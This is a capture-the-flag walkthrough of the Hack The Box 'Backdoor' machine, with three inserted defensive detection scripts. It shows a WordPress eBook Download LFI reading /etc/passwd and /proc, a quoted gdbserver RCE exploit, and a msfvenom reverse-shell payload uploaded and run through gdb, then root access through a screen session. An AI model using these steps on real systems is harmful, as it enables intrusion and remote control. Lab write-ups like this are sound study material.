
Hackthebox Backdoor

Prepared by imamrahman15

version 1.0
March 2022
Contents
1. High Level Summary ... 3
2. Attack Narrative Methodology ... 3
2.1. Phase 1 – Reconnaissance ... 3
2.2. Phase 2 - Enumeration ... 4
2.3. Phase 3 - Penetration ... 15
2.3.1. screen ... 15
3. Additional Resource ... 17

1. High Level Summary
During the reconnaissance and enumeration steps, several vulnerabilities were identified on the
target machine that can be used to gain access to it.

• WordPress plugin LFI
  The LFI in a WordPress plugin was used to enumerate process IDs (PIDs) on the server.

• Screen Session
  A screen session misconfiguration allows unauthorized use of root's session.

Figure 1 Backdoor Flag

2. Attack Narrative Methodology


2.1. Phase 1 – Reconnaissance
These are the port scan results against the target machine; see the Additional Resource
section for the detailed scan method.
Table 1 Reconnaissance - Scanning Results
Port      State  Service  Version
22/tcp    open   ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp    open   http     Apache httpd 2.4.41 ((Ubuntu))
1337/tcp  open   waste?   -

2.2. Phase 2 - Enumeration
2.2.1. HTTP
Scanning
Try this one: https://github.com/rkhal101/nmapAutomator
─[sg-vip-1]─[10.10.14.10]─[htb-imamrahman15@pwnbox-base]─[~/nmapAutomator/10.10.11.125]
└──╼ [★]$ cat nmap/Full_10.10.11.125.nmap
# Nmap 7.92 scan initiated Fri Mar 18 01:12:35 2022 as: nmap -Pn -sCV -p1337 -oN nmap/Full_10.10.11.125.nmap 10.10.11.125
Nmap scan report for 10.10.11.125
Host is up (0.0030s latency).

PORT STATE SERVICE VERSION


1337/tcp open waste?

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .


# Nmap done at Fri Mar 18 01:12:46 2022 -- 1 IP address (1 host up) scanned in 11.61 seconds
─[sg-vip-1]─[10.10.14.10]─[htb-imamrahman15@pwnbox-base]─[~/nmapAutomator/10.10.11.125]
└──╼ [★]$ cat nmap/Basic_10.10.11.125.nmap
# Nmap 7.92 scan initiated Fri Mar 18 01:10:15 2022 as: nmap -Pn -sCV -p22,80 -oN nmap/Basic_10.10.11.125.nmap 10.10.11.125
Nmap scan report for 10.10.11.125
Host is up (0.0029s latency).

PORT STATE SERVICE VERSION


22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
| 256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
|_ 256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Backdoor – Real-Life
|_http-generator: WordPress 5.8.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .


# Nmap done at Fri Mar 18 01:10:23 2022 -- 1 IP address (1 host up) scanned in 8.28 seconds
Nikto found the URL http://10.10.11.125/index.php/wp-json/wp/v2/pages/11
─[sg-vip-1]─[10.10.14.10]─[htb-imamrahman15@pwnbox-base]─[~/backdoor/nmapAutomator]
└──╼ [★]$ cat 10.10.11.125/recon/nikto_10.10.11.125_80.txt
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.11.125
+ Target Hostname: 10.10.11.125
+ Target Port: 80
+ Start Time: 2022-03-17 03:58:08 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with multiple values: (<http://10.10.11.125/index.php/wp-json/>;
rel="https://api.w.org/",<http://10.10.11.125/index.php/wp-json/wp/v2/pages/11>; rel="alternate";
type="application/json",<http://10.10.11.125/>; rel=shortlink,)
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to
the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3268: /wp-content/uploads/: Directory indexing found.
+ /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information

+ /wp-login.php: Wordpress login found
+ 7890 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2022-03-17 03:59:24 (GMT0) (76 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

*********************************************************************
Portions of the server's headers (Apache/2.4.41) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)?

Accessing the web server at
http://10.10.11.125/index.php/wp-json/wp/v2/pages/11
reveals the backend URL backdoor.htb.

Map it in /etc/hosts:
─[sg-vip-1]─[10.10.14.10]─[htb-imamrahman15@pwnbox-base]─[~/backdoor/nmapAutomator]
└──╼ [★]$ cat /etc/hosts
# Host addresses
10.10.11.125 backdoor.htb
127.0.0.1 localhost
127.0.1.1 pwnbox-base
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
─[sg-vip-1]─[10.10.14.10]─[htb-imamrahman15@pwnbox-base]─[~/backdoor/nmapAutomator]
└──╼ [★]$ ping backdoor.htb
PING backdoor.htb (10.10.11.125) 56(84) bytes of data.
64 bytes from backdoor.htb (10.10.11.125): icmp_seq=1 ttl=63 time=2.04 ms
64 bytes from backdoor.htb (10.10.11.125): icmp_seq=2 ttl=63 time=2.24 ms
^C
--- backdoor.htb ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 2.044/2.140/2.237/0.096 ms

WPScan found the following plugin:
[+] akismet
| Location: http://backdoor.htb/wp-content/plugins/akismet/
| Latest Version: 4.2.2
─[sg-vip-1]─[10.10.14.10]─[htb-imamrahman15@pwnbox-base]─[~/backdoor/nmapAutomator/10.10.11.125]
└──╼ [★]$ wpscan --url http://backdoor.htb/ --enumerate p,u --plugins-detection aggressive
_______________________________________________________________
__ _______ _____
\\ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team


Version 3.8.17
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://backdoor.htb/ [10.10.11.125]


[+] Started: Thu Mar 17 04:20:59 2022

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://backdoor.htb/xmlrpc.php


| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://backdoor.htb/readme.html


| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] Upload directory has listing enabled: http://backdoor.htb/wp-content/uploads/


| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://backdoor.htb/wp-cron.php


| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.8.1 identified (Insecure, released on 2021-09-09).


| Found By: Rss Generator (Passive Detection)
| - http://backdoor.htb/index.php/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>
| - http://backdoor.htb/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>

[+] WordPress theme in use: twentyseventeen


| Location: http://backdoor.htb/wp-content/themes/twentyseventeen/
| Last Updated: 2022-01-25T00:00:00.000Z
| Readme: http://backdoor.htb/wp-content/themes/twentyseventeen/readme.txt

| [!] The version is out of date, the latest version is 2.9
| Style URL: http://backdoor.htb/wp-content/themes/twentyseventeen/style.css?ver=20201208
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.8 (80% confidence)
| Found By: Style (Passive Detection)
| - http://backdoor.htb/wp-content/themes/twentyseventeen/style.css?ver=20201208, Match: 'Version: 2.8'

[+] Enumerating Most Popular Plugins (via Aggressive Methods)


Checking Known Locations - Time: 00:00:02
<===============================================================================================
============> (1500 / 1500) 100.00% Time: 00:00:02
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
| Location: http://backdoor.htb/wp-content/plugins/akismet/
| Latest Version: 4.2.2
| Last Updated: 2022-01-24T16:11:00.000Z
|
| Found By: Known Locations (Aggressive Detection)
| - http://backdoor.htb/wp-content/plugins/akismet/, status: 403
|
| The version could not be determined.

[+] Enumerating Users (via Passive and Aggressive Methods)


Brute Forcing Author IDs - Time: 00:00:00
<===============================================================================================
================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://backdoor.htb/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Thu Mar 17 04:21:15 2022


[+] Requests Done: 1516
[+] Cached Requests: 49
[+] Data Sent: 415.521 KB
[+] Data Received: 216.232 KB
[+] Memory used: 238.242 MB
[+] Elapsed time: 00:00:16

Accessing http://backdoor.htb/wp-content/plugins/akismet/ returns a 403, so we move on.

Found a vulnerable WordPress plugin:

[+] WordPress Plugin eBook Download 1.1 - Directory Traversal | php/webapps/39575.txt
─[sg-vip-1]─[10.10.14.10]─[htb-imamrahman15@pwnbox-base]─[~/backdoor/nmapAutomator/10.10.11.125]
└──╼ [★]$ searchsploit akismet
---------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------- ---------------------------------
WordPress Plugin Akismet - Multiple Cross-Site Scripting Vulnerabilities |
php/webapps/37902.php
WordPress Plugin Akismet 2.1.3 - Cross-Site Scripting |
php/webapps/30036.html
------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
─[sg-vip-1]─[10.10.14.10]─[htb-imamrahman15@pwnbox-base]─[~/backdoor/nmapAutomator/10.10.11.125]
└──╼ [★]$ searchsploit ebook download 1.1
------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------ ---------------------------------
WordPress Plugin eBook Download 1.1 - Directory Traversal |
php/webapps/39575.txt
------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
─[sg-vip-1]─[10.10.14.10]─[htb-imamrahman15@pwnbox-base]─[~/backdoor/nmapAutomator/10.10.11.125]
└──╼ [★]$ cat /usr/share/exploitdb/exploits/php/webapps/39575.txt
# Exploit Title: Wordpress eBook Download 1.1 | Directory Traversal
# Exploit Author: Wadeek
# Website Author: https://github.com/Wad-Deek
# Software Link: https://downloads.wordpress.org/plugin/ebook-download.zip
# Version: 1.1
# Tested on: Xampp on Windows7

[Version Disclosure]
======================================
http://localhost/wordpress/wp-content/plugins/ebook-download/readme.txt
======================================

[PoC]
======================================
/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php

Trying the PoC against the target confirms the LFI:
─[sg-vip-1]─[10.10.14.10]─[htb-imamrahman15@pwnbox-base]─[~/backdoor/nmapAutomator/LFISuite]
└──╼ [★]$ curl http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/etc/passwd
/etc/passwd/etc/passwd/etc/passwdroot:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
user:x:1000:1000:user:/home/user:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:113:118:MySQL Server,,,:/nonexistent:/bin/false
<script>window.close()</script>─

Using the LFI, read /proc/[pid]/cmdline for each process ID to enumerate the running processes; one of them is gdbserver:
http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/[pid]/cmdline
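From the defender's side, both the /etc/passwd read and the /proc/[pid]/cmdline enumeration above leave the same trace in the web server's access log. The following script is an added example (not from the writeup) that scans Apache combined-log lines for requests to the vulnerable filedownload.php whose ebookdownloadurl parameter carries a traversal sequence, an absolute path or a /proc/ path; the log lines are constructed, and the check also handles double URL-encoding.

```python
import re
from typing import List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-log lines (not captured from the box). The first
# three mirror the requests shown in this writeup; the last two are benign.
SAMPLE_LOG = """\
10.10.14.10 - - [18/Mar/2022:01:40:11 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/etc/passwd HTTP/1.1" 200 2342 "-" "curl/7.74.0"
10.10.14.10 - - [18/Mar/2022:01:41:02 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/851/cmdline HTTP/1.1" 200 87 "-" "curl/7.74.0"
10.10.14.10 - - [18/Mar/2022:01:42:30 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=..%252F..%252F..%252Fwp-config.php HTTP/1.1" 200 3102 "-" "Mozilla/5.0"
192.0.2.7 - - [18/Mar/2022:01:43:00 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=wp-content/uploads/2022/03/guide.pdf HTTP/1.1" 200 88211 "-" "Mozilla/5.0"
192.0.2.8 - - [18/Mar/2022:01:43:05 +0000] "GET /index.php/wp-json/wp/v2/pages/11 HTTP/1.1" 200 1543 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
VULN_SCRIPT = "/wp-content/plugins/ebook-download/filedownload.php"
PARAM = "ebookdownloadurl"


def classify_path(value: str) -> Optional[str]:
    """Label a suspicious ebookdownloadurl value, or return None if it looks benign."""
    v = unquote(value)  # parse_qs decoded once already; this catches double encoding
    if "../" in v or "..\\" in v:
        return "traversal"
    if v.startswith("/proc/"):
        return "proc-enumeration"
    if v.startswith("/"):
        return "absolute-path"
    return None


def scan_access_log(text: str) -> List[dict]:
    """Return one finding per request that abuses the vulnerable download script."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path != VULN_SCRIPT:
            continue
        for raw in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            kind = classify_path(raw)
            if kind:
                findings.append({
                    "ip": m.group("ip"), "time": m.group("ts"), "kind": kind,
                    "value": unquote(raw), "status": int(m.group("status")),
                })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['kind']:17} {f['value']} (HTTP {f['status']})")
```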

Found a matching exploit:
https://www.exploit-db.com/raw/50539

─[sg-vip-1]─[10.10.14.10]─[htb-imamrahman15@pwnbox-base]─[~]
└──╼ [★]$ wget https://www.exploit-db.com/raw/50539
--2022-03-18 03:13:39-- https://www.exploit-db.com/raw/50539
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.13
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.13|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2826 (2.8K) [text/plain]
Saving to: ‘50539’

50539
100%[===========================================================================================
=========>] 2.76K --.-KB/s in 0s

2022-03-18 03:13:40 (72.0 MB/s) - ‘50539’ saved [2826/2826]

─[sg-vip-1]─[10.10.14.10]─[htb-imamrahman15@pwnbox-base]─[~]
└──╼ [★]$ head 50539
# Exploit Title: GNU gdbserver 9.2 - Remote Command Execution (RCE)
# Date: 2021-11-21
# Exploit Author: Roberto Gesteira Miñarro (7Rocky)
# Vendor Homepage: https://www.gnu.org/software/gdb/
# Software Link: https://www.gnu.org/software/gdb/download/
# Version: GNU gdbserver (Ubuntu 9.2-0ubuntu1~20.04) 9.2
# Tested on: Ubuntu Linux (gdbserver debugging x64 and x86 binaries)

#!/usr/bin/env python3

─[sg-vip-1]─[10.10.14.10]─[htb-imamrahman15@pwnbox-base]─[~]
└──╼ [★]$ less 50539
# Exploit Title: GNU gdbserver 9.2 - Remote Command Execution (RCE)
# Date: 2021-11-21
# Exploit Author: Roberto Gesteira Miñarro (7Rocky)
# Vendor Homepage: https://www.gnu.org/software/gdb/
# Software Link: https://www.gnu.org/software/gdb/download/
# Version: GNU gdbserver (Ubuntu 9.2-0ubuntu1~20.04) 9.2
# Tested on: Ubuntu Linux (gdbserver debugging x64 and x86 binaries)

#!/usr/bin/env python3

import binascii
import socket
import struct
import sys

help = f'''
Usage: python3 {sys.argv[0]} <gdbserver-ip:port> <path-to-shellcode>

Example:
- Victim's gdbserver -> 10.10.10.200:1337
- Attacker's listener -> 10.10.10.100:4444

1. Generate shellcode with msfvenom:

$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.100 LPORT=4444 PrependFork=true -o rev.bin

2. Listen with Netcat:

$ nc -nlvp 4444

3. Run the exploit:

$ python3 {sys.argv[0]} 10.10.10.200:1337 rev.bin
'''

def checksum(s: str) -> str:
    res = sum(map(ord, s)) % 256
    return f'{res:2x}'

def ack(sock):
    sock.send(b'+')

def send(sock, s: str) -> str:
    sock.send(f'${s}#{checksum(s)}'.encode())
    res = sock.recv(1024)
    ack(sock)
    return res.decode()
Exploit gdbserver by following https://book.hacktricks.xyz/pentesting/pentesting-remote-gdbserver:
─[sg-vip-1]─[10.10.14.10]─[htb-imamrahman15@pwnbox-base]─[~]
└──╼ [★]$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.10 LPORT=4444 PrependFork=true -f elf -o binary.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 106 bytes
Final size of elf file: 226 bytes
Saved as: binary.elf
─[sg-vip-1]─[10.10.14.10]─[htb-imamrahman15@pwnbox-base]─[~]
└──╼ [★]$ chmod +x binary.elf
─[sg-vip-1]─[10.10.14.10]─[htb-imamrahman15@pwnbox-base]─[~]
└──╼ [★]$ gdb binary.elf
GNU gdb (Debian 10.1-1.7) 10.1.90.20210103-git
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from binary.elf...
(No debugging symbols found in binary.elf)
(gdb) target extended-remote 10.10.11.125:1337
Remote debugging using 10.10.11.125:1337
Reading /lib64/ld-linux-x86-64.so.2 from remote target...
warning: File transfers from remote targets can be slow. Use "set sysroot" to access files locally instead.
Reading /lib64/ld-linux-x86-64.so.2 from remote target...
Reading symbols from target:/lib64/ld-linux-x86-64.so.2...
Reading /lib64/ld-2.31.so from remote target...
Reading /lib64/.debug/ld-2.31.so from remote target...
Reading /usr/lib/debug//lib64/ld-2.31.so from remote target...
Reading /usr/lib/debug/lib64//ld-2.31.so from remote target...
Reading target:/usr/lib/debug/lib64//ld-2.31.so from remote target...
(No debugging symbols found in target:/lib64/ld-linux-x86-64.so.2)
0x00007ffff7fd0100 in ?? () from target:/lib64/ld-linux-x86-64.so.2
(gdb) remote put binary.elf binary.elf
Successfully sent file "binary.elf".
(gdb) set remote exec-file /home/user/binary.elf
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program:
Reading /home/user/binary.elf from remote target...
Reading /home/user/binary.elf from remote target...
Reading symbols from target:/home/user/binary.elf...
(No debugging symbols found in target:/home/user/binary.elf)
[Detaching after fork from child process 29240]
[Inferior 1 (process 29237) exited normally]
(gdb)
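The root cause on the target is gdbserver listening on 0.0.0.0:1337, where any client can upload and run a binary as the user that started it. The following check is an added example (not from the writeup) that parses `ss -ltnp` output and flags debug servers reachable from the network rather than bound to loopback; the sample output is constructed.

```python
import re
from ipaddress import ip_address
from typing import List

# Constructed `ss -ltnp` output (not captured from the box). The gdbserver line
# on 0.0.0.0:1337 mirrors the unidentified listener found by the scan above.
SAMPLE_SS = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port  Process
LISTEN  0       4096    127.0.0.53%lo:53     0.0.0.0:*          users:(("systemd-resolve",pid=613,fd=13))
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*          users:(("sshd",pid=901,fd=3))
LISTEN  0       1       0.0.0.0:1337         0.0.0.0:*          users:(("gdbserver",pid=851,fd=3))
LISTEN  0       80      127.0.0.1:3306       0.0.0.0:*          users:(("mysqld",pid=1101,fd=21))
LISTEN  0       1       [::1]:2345           [::]:*             users:(("gdbserver",pid=860,fd=3))
LISTEN  0       511     *:80                 *:*                users:(("apache2",pid=1254,fd=4),("apache2",pid=1255,fd=4))
"""

# Debug servers execute code on behalf of whoever connects; they must not be
# reachable from the network without additional access restrictions.
DEBUG_SERVERS = {"gdbserver", "lldb-server"}
PROC_RE = re.compile(r'\("(?P<name>[^"]+)",pid=(?P<pid>\d+)')


def reachable_from_network(local: str) -> bool:
    """True if a 'host:port' local address is bound to anything but loopback."""
    host = local.rsplit(":", 1)[0]
    if host == "*":
        return True
    host = host.strip("[]").split("%", 1)[0]   # handles [::1]:port and 127.0.0.53%lo
    return not ip_address(host).is_loopback


def exposed_debug_listeners(ss_text: str) -> List[dict]:
    """Parse `ss -ltnp` output and list debug servers reachable over the network."""
    found = []
    for line in ss_text.splitlines()[1:]:          # skip the header row
        parts = line.split()
        if len(parts) < 6 or parts[0] != "LISTEN":
            continue
        local = parts[3]
        for m in PROC_RE.finditer(" ".join(parts[5:])):
            if m.group("name") in DEBUG_SERVERS and reachable_from_network(local):
                found.append({"process": m.group("name"), "pid": int(m.group("pid")),
                              "local": local, "port": int(local.rsplit(":", 1)[1])})
    return found


if __name__ == "__main__":
    import subprocess
    try:   # audit the live host when ss is available, else fall back to the sample
        text = subprocess.run(["ss", "-ltnp"], capture_output=True, text=True,
                              check=True).stdout
    except (OSError, subprocess.CalledProcessError):
        text = SAMPLE_SS
    for hit in exposed_debug_listeners(text):
        print(f"[!] {hit['process']} (pid {hit['pid']}) listening on {hit['local']}")
```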

From another shell, listen on port 4444 to catch the reverse shell.

2.3. Phase 3 - Penetration
2.3.1. screen
Download linPEAS and send it to the target over the bind shell.

Found an interesting process: screen running as root.

Spawn a proper TTY shell (https://netsec.ws/?p=337), attach to root's screen session, and we
have root.
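The writeup does not say which screen setting was wrong. The audit below is an added example (not from the writeup) and assumes the usual cause of a root session being attachable by another user: the per-user socket directory S-root under /run/screen, or the session socket inside it, is accessible to other users. It walks the live directory when run on a host and otherwise audits a constructed snapshot.

```python
import os
import pwd
import stat
from typing import Iterable, List, NamedTuple

SCREEN_BASE = "/run/screen"   # per-user socket dirs S-<user> live here on Ubuntu


class Entry(NamedTuple):
    path: str
    mode: int    # full st_mode as returned by os.lstat
    owner: str   # user name of the owner


def audit_screen_entries(entries: Iterable[Entry]) -> List[str]:
    """Flag screen socket directories and session sockets other users can reach."""
    problems = []
    for e in entries:
        parent, name = os.path.split(e.path)
        if stat.S_ISDIR(e.mode):
            # A private S-<user> directory should be 0700; group/other bits expose
            # that user's session sockets to everyone else on the host.
            if e.mode & (stat.S_IRWXG | stat.S_IRWXO):
                problems.append(f"{e.path}: directory is {stat.filemode(e.mode)}, "
                                "expected drwx------")
            if name.startswith("S-") and name[2:] != e.owner:
                problems.append(f"{e.path}: owned by {e.owner}, not {name[2:]}")
        elif stat.S_ISSOCK(e.mode) or stat.S_ISFIFO(e.mode):
            session_user = os.path.basename(parent)[2:]
            if e.owner != session_user:
                problems.append(f"{e.path}: socket owned by {e.owner} inside "
                                f"{session_user}'s directory")
            if e.mode & stat.S_IRWXO:
                problems.append(f"{e.path}: socket is {stat.filemode(e.mode)}, "
                                "world-accessible")
    return problems


def entry_from_path(path: str) -> Entry:
    st = os.lstat(path)
    try:
        owner = pwd.getpwuid(st.st_uid).pw_name
    except KeyError:
        owner = str(st.st_uid)
    return Entry(path, st.st_mode, owner)


def collect_screen_entries(base: str = SCREEN_BASE) -> List[Entry]:
    """Collect every S-<user> directory under base plus the sockets we can list."""
    found = []
    if not os.path.isdir(base):
        return found
    for d in os.listdir(base):
        if not d.startswith("S-"):
            continue
        dpath = os.path.join(base, d)
        found.append(entry_from_path(dpath))
        try:
            found += [entry_from_path(os.path.join(dpath, s)) for s in os.listdir(dpath)]
        except PermissionError:
            pass   # another user's 0700 directory: exactly the healthy case
    return found


# Constructed snapshot (not taken from the box): a healthy user directory beside a
# root directory opened up to everyone, the misconfiguration assumed above.
SAMPLE_ENTRIES = [
    Entry("/run/screen/S-user", stat.S_IFDIR | 0o700, "user"),
    Entry("/run/screen/S-user/1234.pts-0.backdoor", stat.S_IFSOCK | 0o700, "user"),
    Entry("/run/screen/S-root", stat.S_IFDIR | 0o777, "root"),
    Entry("/run/screen/S-root/920.root", stat.S_IFSOCK | 0o777, "root"),
]

if __name__ == "__main__":
    live = collect_screen_entries()
    for problem in audit_screen_entries(live or SAMPLE_ENTRIES):
        print("[!]", problem)
```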

3. Additional Resource
3.1. Initial Scan
Table 2 Additional Resource – Initial Scan result with nmapAutomator.sh Basic

3.2. Full Scan


Table 3 Additional Resource – Full Scan result
